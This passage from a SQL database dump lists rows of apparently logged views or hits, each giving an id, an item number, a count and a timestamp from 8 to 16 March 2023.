18:15:30'),(71218,1600,1,'2023-03-08','2023-03-08 18:42:36'),(71219,4517,1,'2023-03-08','2023-03-08 19:33:47'),(71220,4911,1,'2023-03-08','2023-03-08 20:01:01'),(71221,84,1,'2023-03-08','2023-03-08 20:17:40'),(71222,1749,1,'2023-03-08','2023-03-08 20:17:43'),(71223,2911,1,'2023-03-08','2023-03-08 20:18:51'),(71224,68,1,'2023-03-08','2023-03-08 20:37:04'),(71225,68,1,'2023-03-08','2023-03-08 20:40:37'),(71226,91,1,'2023-03-08','2023-03-08 20:42:41'),(71227,4582,1,'2023-03-08','2023-03-08 21:33:29'),(71228,4612,1,'2023-03-08','2023-03-08 22:08:33'),(71229,4966,1,'2023-03-08','2023-03-08 22:11:56'),(71230,4759,1,'2023-03-08','2023-03-08 22:43:13'),(71231,1604,1,'2023-03-08','2023-03-08 23:47:21'),(71232,4963,1,'2023-03-09','2023-03-09 00:31:52'),(71233,3006,1,'2023-03-09','2023-03-09 02:09:44'),(71234,1544,1,'2023-03-09','2023-03-09 03:09:49'),(71235,467,1,'2023-03-09','2023-03-09 04:26:51'),(71236,68,1,'2023-03-09','2023-03-09 04:41:12'),(71237,5046,1,'2023-03-09','2023-03-09 04:44:58'),(71238,4520,1,'2023-03-09','2023-03-09 05:11:56'),(71239,2159,1,'2023-03-09','2023-03-09 05:19:12'),(71240,76,1,'2023-03-09','2023-03-09 05:20:45'),(71241,91,1,'2023-03-09','2023-03-09 05:21:12'),(71242,2159,1,'2023-03-09','2023-03-09 05:24:29'),(71243,91,1,'2023-03-09','2023-03-09 05:25:31'),(71244,91,1,'2023-03-09','2023-03-09 05:33:05'),(71245,4457,1,'2023-03-09','2023-03-09 07:39:59'),(71246,3705,1,'2023-03-09','2023-03-09 07:57:49'),(71247,5062,1,'2023-03-09','2023-03-09 08:15:51'),(71248,1586,1,'2023-03-09','2023-03-09 08:18:31'),(71249,1586,1,'2023-03-09','2023-03-09 08:18:50'),(71250,5163,1,'2023-03-09','2023-03-09 08:33:04'),(71251,474,1,'2023-03-09','2023-03-09 08:51:50'),(71252,4911,1,'2023-03-09','2023-03-09 09:09:01'),(71253,1722,1,'2023-03-09','2023-03-09 09:10:25'),(71254,570,1,'2023-03-09','2023-03-09 10:01:35'),(71255,5163,1,'2023-03-09','2023-03-09 10:20:41'),(71256,4835,1,'2023-03-09','2023-03-09 10:29:43'),(71257,4911,1,'2023-03-09','2023-03-09 10:37:43'),(71258,5163,1,'2023-03-09','2023-03-09 10:44:53'),(71259,87,1,'2023-03-09','2023-03-09 10:46:18'),(71260,87,1,'2023-03-09','2023-03-09 10:46:51'),(71261,5163,1,'2023-03-09','2023-03-09 10:46:59'),(71262,76,1,'2023-03-09','2023-03-09 10:47:13'),(71263,68,1,'2023-03-09','2023-03-09 10:47:44'),(71264,89,1,'2023-03-09','2023-03-09 10:48:51'),(71265,76,1,'2023-03-09','2023-03-09 10:48:52'),(71266,5163,1,'2023-03-09','2023-03-09 10:48:54'),(71267,4323,1,'2023-03-09','2023-03-09 10:50:41'),(71268,4930,1,'2023-03-09','2023-03-09 10:52:44'),(71269,91,1,'2023-03-09','2023-03-09 10:53:39'),(71270,4930,1,'2023-03-09','2023-03-09 10:53:58'),(71271,87,1,'2023-03-09','2023-03-09 10:53:58'),(71272,4911,1,'2023-03-09','2023-03-09 10:53:59'),(71273,87,1,'2023-03-09','2023-03-09 11:43:25'),(71274,91,1,'2023-03-09','2023-03-09 11:43:57'),(71275,3664,1,'2023-03-09','2023-03-09 11:57:08'),(71276,5163,1,'2023-03-09','2023-03-09 12:28:37'),(71277,80,1,'2023-03-09','2023-03-09 12:28:47'),(71278,5253,1,'2023-03-09','2023-03-09 13:47:10'),(71279,1739,1,'2023-03-09','2023-03-09 13:48:26'),(71280,2809,1,'2023-03-09','2023-03-09 14:32:08'),(71281,4238,1,'2023-03-09','2023-03-09 14:32:17'),(71282,72,1,'2023-03-09','2023-03-09 14:51:01'),(71283,4420,1,'2023-03-09','2023-03-09 14:51:32'),(71284,3313,1,'2023-03-09','2023-03-09 15:20:56'),(71285,4747,1,'2023-03-09','2023-03-09 15:22:03'),(71286,4960,1,'2023-03-09','2023-03-09 16:07:37'),(71287,91,1,'2023-03-09','2023-03-09 16:49:09'),(71288,91,1,'2023-03-09','2023-03-09 16:49:10'),(71289,80,1,'2023-03-09','2023-03-09 17:15:32'),(71290,4960,1,'2023-03-09','2023-03-09 18:30:16'),(71291,2813,1,'2023-03-09','2023-03-09 18:55:28'),(71292,4911,1,'2023-03-09','2023-03-09 20:33:26'),(71293,68,1,'2023-03-09','2023-03-09 20:33:52'),(71294,68,1,'2023-03-09','2023-03-09 20:40:45'),(71295,87,1,'2023-03-09','2023-03-09 20:40:52'),(71296,488,1,'2023-03-09','2023-03-09 20:40:57'),(71297,68,1,'2023-03-09','2023-03-09 20:41:05'),(71298,4930,1,'2023-03-09','2023-03-09 20:41:13'),(71299,4911,1,'2023-03-09','2023-03-09 20:41:18'),(71300,89,1,'2023-03-09','2023-03-09 20:41:37'),(71301,89,1,'2023-03-09','2023-03-09 20:41:52'),(71302,89,1,'2023-03-09','2023-03-09 20:42:04'),(71303,467,1,'2023-03-09','2023-03-09 22:36:28'),(71304,5163,1,'2023-03-09','2023-03-09 23:05:27'),(71305,1608,1,'2023-03-10','2023-03-10 00:19:07'),(71306,80,1,'2023-03-10','2023-03-10 00:24:33'),(71307,1608,1,'2023-03-10','2023-03-10 00:25:31'),(71308,1766,1,'2023-03-10','2023-03-10 00:31:47'),(71309,4966,1,'2023-03-10','2023-03-10 01:06:01'),(71310,2297,1,'2023-03-10','2023-03-10 01:31:24'),(71311,4485,1,'2023-03-10','2023-03-10 02:32:34'),(71312,2965,1,'2023-03-10','2023-03-10 03:04:59'),(71313,2297,1,'2023-03-10','2023-03-10 03:12:16'),(71314,4966,1,'2023-03-10','2023-03-10 03:18:22'),(71315,1608,1,'2023-03-10','2023-03-10 03:19:30'),(71316,3083,1,'2023-03-10','2023-03-10 03:40:48'),(71317,2991,1,'2023-03-10','2023-03-10 05:20:25'),(71318,1776,1,'2023-03-10','2023-03-10 05:58:41'),(71319,470,1,'2023-03-10','2023-03-10 06:17:13'),(71320,5062,1,'2023-03-10','2023-03-10 07:18:42'),(71321,3055,1,'2023-03-10','2023-03-10 07:36:32'),(71322,4911,1,'2023-03-10','2023-03-10 09:03:00'),(71323,68,1,'2023-03-10','2023-03-10 09:03:16'),(71324,4911,1,'2023-03-10','2023-03-10 09:03:26'),(71325,80,1,'2023-03-10','2023-03-10 09:09:00'),(71326,80,1,'2023-03-10','2023-03-10 09:12:11'),(71327,80,1,'2023-03-10','2023-03-10 09:12:27'),(71328,2410,1,'2023-03-10','2023-03-10 09:12:46'),(71329,2395,1,'2023-03-10','2023-03-10 09:13:15'),(71330,2410,1,'2023-03-10','2023-03-10 09:13:38'),(71331,2411,1,'2023-03-10','2023-03-10 09:13:58'),(71332,2410,1,'2023-03-10','2023-03-10 09:14:31'),(71333,1594,1,'2023-03-10','2023-03-10 10:02:33'),(71334,91,1,'2023-03-10','2023-03-10 10:34:38'),(71335,91,1,'2023-03-10','2023-03-10 10:34:48'),(71336,4608,1,'2023-03-10','2023-03-10 10:35:24'),(71337,1594,1,'2023-03-10','2023-03-10 10:37:13'),(71338,5140,1,'2023-03-10','2023-03-10 10:53:30'),(71339,80,1,'2023-03-10','2023-03-10 10:54:01'),(71340,84,1,'2023-03-10','2023-03-10 10:54:25'),(71341,1877,1,'2023-03-10','2023-03-10 10:54:56'),(71342,1877,1,'2023-03-10','2023-03-10 10:56:20'),(71343,91,1,'2023-03-10','2023-03-10 10:57:07'),(71344,5146,1,'2023-03-10','2023-03-10 10:57:38'),(71345,4966,1,'2023-03-10','2023-03-10 11:32:55'),(71346,4966,1,'2023-03-10','2023-03-10 11:33:45'),(71347,4966,1,'2023-03-10','2023-03-10 11:38:39'),(71348,76,1,'2023-03-10','2023-03-10 11:39:00'),(71349,4966,1,'2023-03-10','2023-03-10 11:39:07'),(71350,1594,1,'2023-03-10','2023-03-10 12:01:48'),(71351,1594,1,'2023-03-10','2023-03-10 12:03:14'),(71352,4651,1,'2023-03-10','2023-03-10 12:17:20'),(71353,4323,1,'2023-03-10','2023-03-10 12:29:37'),(71354,4416,1,'2023-03-10','2023-03-10 12:34:38'),(71355,4416,1,'2023-03-10','2023-03-10 12:43:17'),(71356,1711,1,'2023-03-10','2023-03-10 12:52:06'),(71357,4703,1,'2023-03-10','2023-03-10 13:12:31'),(71358,4960,1,'2023-03-10','2023-03-10 13:49:08'),(71359,84,1,'2023-03-10','2023-03-10 13:50:20'),(71360,4930,1,'2023-03-10','2023-03-10 13:50:46'),(71361,84,1,'2023-03-10','2023-03-10 13:51:19'),(71362,4960,1,'2023-03-10','2023-03-10 13:51:24'),(71363,89,1,'2023-03-10','2023-03-10 13:51:42'),(71364,89,1,'2023-03-10','2023-03-10 13:52:07'),(71365,89,1,'2023-03-10','2023-03-10 13:52:20'),(71366,4960,1,'2023-03-10','2023-03-10 13:52:22'),(71367,87,1,'2023-03-10','2023-03-10 13:53:02'),(71368,4960,1,'2023-03-10','2023-03-10 13:54:45'),(71369,91,1,'2023-03-10','2023-03-10 14:15:55'),(71370,1602,1,'2023-03-10','2023-03-10 15:06:01'),(71371,4457,1,'2023-03-10','2023-03-10 15:23:41'),(71372,4911,1,'2023-03-10','2023-03-10 16:02:49'),(71373,4911,1,'2023-03-10','2023-03-10 16:07:48'),(71374,1598,1,'2023-03-10','2023-03-10 16:27:38'),(71375,1598,1,'2023-03-10','2023-03-10 16:27:54'),(71376,4520,1,'2023-03-10','2023-03-10 17:10:53'),(71377,5163,1,'2023-03-10','2023-03-10 17:13:48'),(71378,1584,1,'2023-03-10','2023-03-10 18:26:30'),(71379,4612,1,'2023-03-10','2023-03-10 19:10:16'),(71380,1596,1,'2023-03-10','2023-03-10 20:55:28'),(71381,68,1,'2023-03-10','2023-03-10 21:19:02'),(71382,1728,1,'2023-03-10','2023-03-10 21:27:29'),(71383,4911,1,'2023-03-10','2023-03-10 21:49:36'),(71384,4960,1,'2023-03-10','2023-03-10 22:18:17'),(71385,2911,1,'2023-03-10','2023-03-10 23:25:58'),(71386,1596,1,'2023-03-10','2023-03-10 23:48:35'),(71387,4753,1,'2023-03-11','2023-03-11 01:10:17'),(71388,3534,1,'2023-03-11','2023-03-11 02:30:08'),(71389,3771,1,'2023-03-11','2023-03-11 02:40:15'),(71390,3534,1,'2023-03-11','2023-03-11 05:52:35'),(71391,5280,1,'2023-03-11','2023-03-11 07:26:09'),(71392,4660,1,'2023-03-11','2023-03-11 07:55:17'),(71393,4960,1,'2023-03-11','2023-03-11 08:40:39'),(71394,1614,1,'2023-03-11','2023-03-11 09:36:18'),(71395,5125,1,'2023-03-11','2023-03-11 10:10:18'),(71396,1745,1,'2023-03-11','2023-03-11 11:36:10'),(71397,4648,1,'2023-03-11','2023-03-11 11:40:14'),(71398,474,1,'2023-03-11','2023-03-11 11:51:26'),(71399,476,1,'2023-03-11','2023-03-11 11:51:35'),(71400,91,1,'2023-03-11','2023-03-11 11:51:51'),(71401,4785,1,'2023-03-11','2023-03-11 13:38:15'),(71402,2297,1,'2023-03-11','2023-03-11 14:59:39'),(71403,2297,1,'2023-03-11','2023-03-11 15:05:01'),(71404,2297,1,'2023-03-11','2023-03-11 15:15:30'),(71405,76,1,'2023-03-11','2023-03-11 15:16:06'),(71406,4416,1,'2023-03-11','2023-03-11 15:33:39'),(71407,2904,1,'2023-03-11','2023-03-11 15:56:43'),(71408,4911,1,'2023-03-11','2023-03-11 16:33:20'),(71409,4454,1,'2023-03-11','2023-03-11 16:35:37'),(71410,1602,1,'2023-03-11','2023-03-11 16:52:49'),(71411,1594,1,'2023-03-11','2023-03-11 16:53:17'),(71412,3731,1,'2023-03-11','2023-03-11 17:04:07'),(71413,2297,1,'2023-03-11','2023-03-11 17:04:54'),(71414,2297,1,'2023-03-11','2023-03-11 17:22:35'),(71415,4977,1,'2023-03-11','2023-03-11 17:54:14'),(71416,1730,1,'2023-03-11','2023-03-11 18:16:22'),(71417,1722,1,'2023-03-11','2023-03-11 18:18:40'),(71418,91,1,'2023-03-11','2023-03-11 18:25:40'),(71419,4344,1,'2023-03-11','2023-03-11 18:25:42'),(71420,1722,1,'2023-03-11','2023-03-11 18:28:07'),(71421,1722,1,'2023-03-11','2023-03-11 18:33:16'),(71422,1544,1,'2023-03-11','2023-03-11 18:54:06'),(71423,4520,1,'2023-03-11','2023-03-11 18:55:05'),(71424,470,1,'2023-03-11','2023-03-11 19:00:02'),(71425,1544,1,'2023-03-11','2023-03-11 19:01:16'),(71426,3083,1,'2023-03-11','2023-03-11 19:33:59'),(71427,80,1,'2023-03-11','2023-03-11 19:56:02'),(71428,5157,1,'2023-03-11','2023-03-11 20:23:37'),(71429,468,1,'2023-03-11','2023-03-11 21:44:50'),(71430,3030,1,'2023-03-11','2023-03-11 21:52:18'),(71431,470,1,'2023-03-11','2023-03-11 22:10:52'),(71432,335,1,'2023-03-11','2023-03-11 22:39:47'),(71433,3034,1,'2023-03-11','2023-03-11 23:19:22'),(71434,4785,1,'2023-03-11','2023-03-11 23:34:45'),(71435,4785,1,'2023-03-12','2023-03-12 00:02:12'),(71436,468,1,'2023-03-12','2023-03-12 00:29:36'),(71437,72,1,'2023-03-12','2023-03-12 00:36:37'),(71438,72,1,'2023-03-12','2023-03-12 00:36:59'),(71439,72,1,'2023-03-12','2023-03-12 00:37:17'),(71440,72,1,'2023-03-12','2023-03-12 00:37:37'),(71441,72,1,'2023-03-12','2023-03-12 00:38:00'),(71442,91,1,'2023-03-12','2023-03-12 00:39:13'),(71443,4612,1,'2023-03-12','2023-03-12 00:41:59'),(71444,5163,1,'2023-03-12','2023-03-12 00:52:27'),(71445,1544,1,'2023-03-12','2023-03-12 01:05:30'),(71446,482,1,'2023-03-12','2023-03-12 01:09:59'),(71447,3041,1,'2023-03-12','2023-03-12 01:15:03'),(71448,4485,1,'2023-03-12','2023-03-12 01:54:58'),(71449,1608,1,'2023-03-12','2023-03-12 01:55:02'),(71450,4485,1,'2023-03-12','2023-03-12 03:02:38'),(71451,2801,1,'2023-03-12','2023-03-12 04:17:12'),(71452,4911,1,'2023-03-12','2023-03-12 04:47:44'),(71453,1772,1,'2023-03-12','2023-03-12 05:12:31'),(71454,3307,1,'2023-03-12','2023-03-12 05:17:12'),(71455,2419,1,'2023-03-12','2023-03-12 05:47:13'),(71456,1602,1,'2023-03-12','2023-03-12 05:52:19'),(71457,1602,1,'2023-03-12','2023-03-12 05:56:14'),(71458,4238,1,'2023-03-12','2023-03-12 06:47:13'),(71459,1877,1,'2023-03-12','2023-03-12 06:50:32'),(71460,467,1,'2023-03-12','2023-03-12 06:52:15'),(71461,80,1,'2023-03-12','2023-03-12 07:12:17'),(71462,2956,1,'2023-03-12','2023-03-12 07:39:17'),(71463,5163,1,'2023-03-12','2023-03-12 08:02:57'),(71464,91,1,'2023-03-12','2023-03-12 08:03:31'),(71465,5067,1,'2023-03-12','2023-03-12 08:09:21'),(71466,5280,1,'2023-03-12','2023-03-12 08:15:43'),(71467,4326,1,'2023-03-12','2023-03-12 08:21:37'),(71468,470,1,'2023-03-12','2023-03-12 08:24:44'),(71469,4911,1,'2023-03-12','2023-03-12 08:27:22'),(71470,3673,1,'2023-03-12','2023-03-12 09:09:22'),(71471,2296,1,'2023-03-12','2023-03-12 09:54:24'),(71472,3482,1,'2023-03-12','2023-03-12 10:22:46'),(71473,5271,1,'2023-03-12','2023-03-12 10:22:46'),(71474,3742,1,'2023-03-12','2023-03-12 10:22:46'),(71475,3498,1,'2023-03-12','2023-03-12 10:22:48'),(71476,1594,1,'2023-03-12','2023-03-12 10:50:23'),(71477,1594,1,'2023-03-12','2023-03-12 10:51:00'),(71478,1705,1,'2023-03-12','2023-03-12 11:17:15'),(71479,4238,1,'2023-03-12','2023-03-12 12:07:19'),(71480,4238,1,'2023-03-12','2023-03-12 12:10:52'),(71481,4980,1,'2023-03-12','2023-03-12 13:15:16'),(71482,2775,1,'2023-03-12','2023-03-12 14:02:43'),(71483,4911,1,'2023-03-12','2023-03-12 14:38:34'),(71484,4966,1,'2023-03-12','2023-03-12 15:19:01'),(71485,4966,1,'2023-03-12','2023-03-12 15:58:11'),(71486,3102,1,'2023-03-12','2023-03-12 16:43:11'),(71487,1745,1,'2023-03-12','2023-03-12 17:04:42'),(71488,4966,1,'2023-03-12','2023-03-12 17:11:42'),(71489,4960,1,'2023-03-12','2023-03-12 17:41:23'),(71490,4966,1,'2023-03-12','2023-03-12 18:53:08'),(71491,2297,1,'2023-03-12','2023-03-12 18:58:34'),(71492,3004,1,'2023-03-12','2023-03-12 19:30:40'),(71493,4747,1,'2023-03-12','2023-03-12 19:46:59'),(71494,4412,1,'2023-03-12','2023-03-12 19:48:39'),(71495,1602,1,'2023-03-12','2023-03-12 21:13:50'),(71496,1600,1,'2023-03-12','2023-03-12 21:18:39'),(71497,1610,1,'2023-03-12','2023-03-12 21:33:58'),(71498,3781,1,'2023-03-12','2023-03-12 22:01:38'),(71499,3030,1,'2023-03-12','2023-03-12 23:31:39'),(71500,1602,1,'2023-03-13','2023-03-13 02:03:28'),(71501,1582,1,'2023-03-13','2023-03-13 03:24:41'),(71502,1614,1,'2023-03-13','2023-03-13 05:05:25'),(71503,3034,1,'2023-03-13','2023-03-13 05:11:31'),(71504,4457,1,'2023-03-13','2023-03-13 05:38:52'),(71505,5062,1,'2023-03-13','2023-03-13 06:05:50'),(71506,3781,1,'2023-03-13','2023-03-13 07:29:53'),(71507,5140,1,'2023-03-13','2023-03-13 09:57:33'),(71508,1596,1,'2023-03-13','2023-03-13 10:23:46'),(71509,2309,1,'2023-03-13','2023-03-13 11:07:53'),(71510,469,1,'2023-03-13','2023-03-13 11:15:59'),(71511,2457,1,'2023-03-13','2023-03-13 11:20:43'),(71512,80,1,'2023-03-13','2023-03-13 11:22:17'),(71513,2457,1,'2023-03-13','2023-03-13 11:23:07'),(71514,5163,1,'2023-03-13','2023-03-13 11:53:59'),(71515,80,1,'2023-03-13','2023-03-13 11:56:55'),(71516,80,1,'2023-03-13','2023-03-13 12:03:01'),(71517,80,1,'2023-03-13','2023-03-13 12:04:31'),(71518,5163,1,'2023-03-13','2023-03-13 12:05:40'),(71519,1596,1,'2023-03-13','2023-03-13 12:33:08'),(71520,4412,1,'2023-03-13','2023-03-13 13:36:38'),(71521,1588,1,'2023-03-13','2023-03-13 13:58:35'),(71522,2503,1,'2023-03-13','2023-03-13 14:02:36'),(71523,1588,1,'2023-03-13','2023-03-13 14:07:32'),(71524,91,1,'2023-03-13','2023-03-13 14:09:14'),(71525,2809,1,'2023-03-13','2023-03-13 14:46:58'),(71526,3664,1,'2023-03-13','2023-03-13 14:58:02'),(71527,1594,1,'2023-03-13','2023-03-13 14:58:47'),(71528,1594,1,'2023-03-13','2023-03-13 14:59:03'),(71529,4938,1,'2023-03-13','2023-03-13 15:17:57'),(71530,1588,1,'2023-03-13','2023-03-13 15:49:02'),(71531,5062,1,'2023-03-13','2023-03-13 16:32:29'),(71532,3107,1,'2023-03-13','2023-03-13 16:41:46'),(71533,3104,1,'2023-03-13','2023-03-13 16:48:25'),(71534,3102,1,'2023-03-13','2023-03-13 16:51:28'),(71535,4416,1,'2023-03-13','2023-03-13 16:54:16'),(71536,4420,1,'2023-03-13','2023-03-13 16:58:17'),(71537,5024,1,'2023-03-13','2023-03-13 17:02:05'),(71538,5028,1,'2023-03-13','2023-03-13 17:05:14'),(71539,5062,1,'2023-03-13','2023-03-13 17:08:25'),(71540,4960,1,'2023-03-13','2023-03-13 17:37:49'),(71541,1872,1,'2023-03-13','2023-03-13 17:43:42'),(71542,1598,1,'2023-03-13','2023-03-13 18:41:22'),(71543,1602,1,'2023-03-13','2023-03-13 19:16:41'),(71544,4416,1,'2023-03-13','2023-03-13 19:49:08'),(71545,469,1,'2023-03-13','2023-03-13 20:03:11'),(71546,1745,1,'2023-03-13','2023-03-13 21:03:58'),(71547,4412,1,'2023-03-13','2023-03-13 21:53:03'),(71548,570,1,'2023-03-13','2023-03-13 22:04:37'),(71549,4335,1,'2023-03-13','2023-03-13 23:37:31'),(71550,1586,1,'2023-03-13','2023-03-13 23:49:30'),(71551,1586,1,'2023-03-13','2023-03-13 23:50:15'),(71552,1614,1,'2023-03-13','2023-03-13 23:52:11'),(71553,1586,1,'2023-03-14','2023-03-14 00:09:13'),(71554,2309,1,'2023-03-14','2023-03-14 00:15:35'),(71555,1612,1,'2023-03-14','2023-03-14 00:59:00'),(71556,5280,1,'2023-03-14','2023-03-14 01:04:36'),(71557,4762,1,'2023-03-14','2023-03-14 01:22:07'),(71558,76,1,'2023-03-14','2023-03-14 02:13:08'),(71559,1600,1,'2023-03-14','2023-03-14 02:18:54'),(71560,5071,1,'2023-03-14','2023-03-14 02:20:35'),(71561,1730,1,'2023-03-14','2023-03-14 02:35:30'),(71562,80,1,'2023-03-14','2023-03-14 02:52:12'),(71563,3735,1,'2023-03-14','2023-03-14 03:07:16'),(71564,4938,1,'2023-03-14','2023-03-14 03:20:40'),(71565,5157,1,'2023-03-14','2023-03-14 04:05:27'),(71566,4485,1,'2023-03-14','2023-03-14 04:24:18'),(71567,4980,1,'2023-03-14','2023-03-14 04:51:33'),(71568,4866,1,'2023-03-14','2023-03-14 04:52:32'),(71569,1586,1,'2023-03-14','2023-03-14 05:21:42'),(71570,1610,1,'2023-03-14','2023-03-14 05:58:11'),(71571,4963,1,'2023-03-14','2023-03-14 06:02:17'),(71572,68,1,'2023-03-14','2023-03-14 06:02:38'),(71573,4963,1,'2023-03-14','2023-03-14 06:02:56'),(71574,5033,1,'2023-03-14','2023-03-14 06:45:18'),(71575,4911,1,'2023-03-14','2023-03-14 07:01:54'),(71576,2309,1,'2023-03-14','2023-03-14 07:11:29'),(71577,1582,1,'2023-03-14','2023-03-14 07:29:03'),(71578,91,1,'2023-03-14','2023-03-14 07:38:34'),(71579,4608,1,'2023-03-14','2023-03-14 07:48:27'),(71580,4520,1,'2023-03-14','2023-03-14 08:34:34'),(71581,4911,1,'2023-03-14','2023-03-14 09:06:51'),(71582,84,1,'2023-03-14','2023-03-14 09:09:53'),(71583,89,1,'2023-03-14','2023-03-14 09:10:50'),(71584,89,1,'2023-03-14','2023-03-14 09:11:38'),(71585,89,1,'2023-03-14','2023-03-14 09:16:27'),(71586,4930,1,'2023-03-14','2023-03-14 09:16:58'),(71587,91,1,'2023-03-14','2023-03-14 09:17:36'),(71588,4897,1,'2023-03-14','2023-03-14 09:19:17'),(71589,5163,1,'2023-03-14','2023-03-14 09:25:43'),(71590,68,1,'2023-03-14','2023-03-14 09:25:57'),(71591,4966,1,'2023-03-14','2023-03-14 10:46:18'),(71592,91,1,'2023-03-14','2023-03-14 10:47:44'),(71593,4612,1,'2023-03-14','2023-03-14 10:48:05'),(71594,91,1,'2023-03-14','2023-03-14 11:24:10'),(71595,4930,1,'2023-03-14','2023-03-14 11:24:13'),(71596,89,1,'2023-03-14','2023-03-14 11:24:14'),(71597,89,1,'2023-03-14','2023-03-14 11:24:28'),(71598,89,1,'2023-03-14','2023-03-14 11:24:30'),(71599,84,1,'2023-03-14','2023-03-14 11:24:32'),(71600,4911,1,'2023-03-14','2023-03-14 11:24:33'),(71601,68,1,'2023-03-14','2023-03-14 11:36:10'),(71602,4520,1,'2023-03-14','2023-03-14 11:40:31'),(71603,1588,1,'2023-03-14','2023-03-14 11:55:24'),(71604,80,1,'2023-03-14','2023-03-14 11:56:59'),(71605,68,1,'2023-03-14','2023-03-14 11:59:47'),(71606,80,1,'2023-03-14','2023-03-14 12:00:25'),(71607,68,1,'2023-03-14','2023-03-14 12:05:34'),(71608,5163,1,'2023-03-14','2023-03-14 12:13:55'),(71609,1598,1,'2023-03-14','2023-03-14 12:20:15'),(71610,5163,1,'2023-03-14','2023-03-14 12:33:52'),(71611,5163,1,'2023-03-14','2023-03-14 12:33:57'),(71612,5163,1,'2023-03-14','2023-03-14 12:35:49'),(71613,1602,1,'2023-03-14','2023-03-14 13:07:05'),(71614,5163,1,'2023-03-14','2023-03-14 13:07:21'),(71615,4768,1,'2023-03-14','2023-03-14 13:21:20'),(71616,2617,1,'2023-03-14','2023-03-14 13:29:35'),(71617,2297,1,'2023-03-14','2023-03-14 13:45:40'),(71618,1544,1,'2023-03-14','2023-03-14 13:55:19'),(71619,74,1,'2023-03-14','2023-03-14 13:55:41'),(71620,4654,1,'2023-03-14','2023-03-14 14:00:37'),(71621,1728,1,'2023-03-14','2023-03-14 14:05:37'),(71622,2152,1,'2023-03-14','2023-03-14 14:06:49'),(71623,4335,1,'2023-03-14','2023-03-14 14:10:43'),(71624,68,1,'2023-03-14','2023-03-14 14:14:35'),(71625,1544,1,'2023-03-14','2023-03-14 14:15:52'),(71626,4323,1,'2023-03-14','2023-03-14 14:33:20'),(71627,2297,1,'2023-03-14','2023-03-14 14:41:41'),(71628,1606,1,'2023-03-14','2023-03-14 14:53:54'),(71629,4911,1,'2023-03-14','2023-03-14 15:02:43'),(71630,2558,1,'2023-03-14','2023-03-14 15:08:54'),(71631,4457,1,'2023-03-14','2023-03-14 15:30:30'),(71632,5153,1,'2023-03-14','2023-03-14 15:58:55'),(71633,2165,1,'2023-03-14','2023-03-14 16:18:25'),(71634,3746,1,'2023-03-14','2023-03-14 16:23:56'),(71635,2309,1,'2023-03-14','2023-03-14 16:36:00'),(71636,5256,1,'2023-03-14','2023-03-14 16:50:16'),(71637,2297,1,'2023-03-14','2023-03-14 16:51:53'),(71638,3287,1,'2023-03-14','2023-03-14 16:51:56'),(71639,3285,1,'2023-03-14','2023-03-14 16:55:03'),(71640,4759,1,'2023-03-14','2023-03-14 17:01:49'),(71641,5256,1,'2023-03-14','2023-03-14 17:12:49'),(71642,4323,1,'2023-03-14','2023-03-14 18:04:53'),(71643,4960,1,'2023-03-14','2023-03-14 18:27:17'),(71644,3092,1,'2023-03-14','2023-03-14 18:44:09'),(71645,2609,1,'2023-03-14','2023-03-14 18:44:53'),(71646,1722,1,'2023-03-14','2023-03-14 19:57:12'),(71647,1586,1,'2023-03-14','2023-03-14 23:04:43'),(71648,1614,1,'2023-03-14','2023-03-14 23:56:39'),(71649,3691,1,'2023-03-15','2023-03-15 01:14:28'),(71650,2457,1,'2023-03-15','2023-03-15 01:23:24'),(71651,4663,1,'2023-03-15','2023-03-15 01:53:17'),(71652,4703,1,'2023-03-15','2023-03-15 02:14:53'),(71653,1544,1,'2023-03-15','2023-03-15 03:08:14'),(71654,3790,1,'2023-03-15','2023-03-15 03:15:54'),(71655,1602,1,'2023-03-15','2023-03-15 03:17:47'),(71656,3087,1,'2023-03-15','2023-03-15 04:45:55'),(71657,1715,1,'2023-03-15','2023-03-15 04:47:44'),(71658,1602,1,'2023-03-15','2023-03-15 04:47:45'),(71659,1782,1,'2023-03-15','2023-03-15 05:54:22'),(71660,106,1,'2023-03-15','2023-03-15 07:02:44'),(71661,4326,1,'2023-03-15','2023-03-15 09:32:11'),(71662,5033,1,'2023-03-15','2023-03-15 09:32:22'),(71663,2159,1,'2023-03-15','2023-03-15 09:35:11'),(71664,3285,1,'2023-03-15','2023-03-15 09:36:36'),(71665,4412,1,'2023-03-15','2023-03-15 09:59:22'),(71666,1612,1,'2023-03-15','2023-03-15 10:01:53'),(71667,469,1,'2023-03-15','2023-03-15 10:09:43'),(71668,1722,1,'2023-03-15','2023-03-15 10:15:57'),(71669,4911,1,'2023-03-15','2023-03-15 11:26:16'),(71670,1586,1,'2023-03-15','2023-03-15 12:01:09'),(71671,1586,1,'2023-03-15','2023-03-15 12:01:09'),(71672,4960,1,'2023-03-15','2023-03-15 12:32:07'),(71673,4966,1,'2023-03-15','2023-03-15 12:57:32'),(71674,1612,1,'2023-03-15','2023-03-15 13:14:44'),(71675,4966,1,'2023-03-15','2023-03-15 13:55:43'),(71676,4551,1,'2023-03-15','2023-03-15 14:05:41'),(71677,4551,1,'2023-03-15','2023-03-15 14:06:42'),(71678,570,1,'2023-03-15','2023-03-15 14:10:33'),(71679,4802,1,'2023-03-15','2023-03-15 14:24:07'),(71680,570,1,'2023-03-15','2023-03-15 14:32:31'),(71681,1600,1,'2023-03-15','2023-03-15 14:32:50'),(71682,1600,1,'2023-03-15','2023-03-15 14:36:34'),(71683,570,1,'2023-03-15','2023-03-15 14:36:59'),(71684,4966,1,'2023-03-15','2023-03-15 14:41:18'),(71685,4694,1,'2023-03-15','2023-03-15 15:07:09'),(71686,1770,1,'2023-03-15','2023-03-15 15:10:11'),(71687,4335,1,'2023-03-15','2023-03-15 15:13:09'),(71688,485,1,'2023-03-15','2023-03-15 17:24:59'),(71689,4960,1,'2023-03-15','2023-03-15 21:14:08'),(71690,3290,1,'2023-03-15','2023-03-15 21:16:31'),(71691,1722,1,'2023-03-15','2023-03-15 22:12:15'),(71692,1722,1,'2023-03-15','2023-03-15 22:23:19'),(71693,4457,1,'2023-03-15','2023-03-15 23:23:19'),(71694,4341,1,'2023-03-16','2023-03-16 00:21:17'),(71695,4341,1,'2023-03-16','2023-03-16 00:29:17'),(71696,5080,1,'2023-03-16','2023-03-16 01:00:24'),(71697,4911,1,'2023-03-16','2023-03-16 01:49:29'),(71698,5128,1,'2023-03-16','2023-03-16 01:51:14'),(71699,2989,1,'2023-03-16','2023-03-16 01:52:14'),(71700,4457,1,'2023-03-16','2023-03-16 02:32:45'),(71701,3107,1,'2023-03-16','2023-03-16 03:26:44'),(71702,74,1,'2023-03-16','2023-03-16 05:20:51'),(71703,4485,1,'2023-03-16','2023-03-16 05:22:01'),(71704,4753,1,'2023-03-16','2023-03-16 